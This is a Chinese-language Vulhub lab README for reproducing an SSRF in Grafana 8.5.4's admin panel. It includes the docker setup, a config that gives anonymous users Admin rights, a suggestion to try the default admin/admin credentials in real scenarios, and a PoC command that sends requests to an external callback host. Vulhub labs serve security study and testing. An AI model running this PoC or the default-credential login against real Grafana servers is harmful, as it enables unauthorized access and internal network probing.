Files
vulhub/grafana/admin-ssrf/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

40 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Grafana管理后台SSRF
Grafana是一个开源的度量分析与可视化套件。在其管理后台中存在一个功能攻击者可以用于向任意地址发送HTTP请求且支持自定义HTTP Header。
参考链接:
- <https://github.com/RandomRobbieBF/grafana-ssrf>
## 漏洞环境
执行如下命令启动一个Grafana 8.5.4
```
docker compose up -d
```
环境启动后,访问`http://your-ip:3000`即可查看到管理后台。这个管理后台是不需要登录的因为Vulhub环境设置了匿名用户的权限
```ini
[auth.anonymous]
enabled = true
org_role = Admin
```
在真实场景中,如果你没有权限访问管理界面,可以尝试使用默认账号密码`admin``admin`,只能能够成功登录后台的用户才能利用这个漏洞。
## 漏洞复现
使用[这个POC](https://github.com/RandomRobbieBF/grafana-ssrf)来复现SSRF漏洞
```
python grafana-ssrf.py -H http://your-ip:3000 -u http://example.interact.sh/attack
```
![](1.png)
可见我们的反连平台已成功收到了HTTP请求
![](2.png)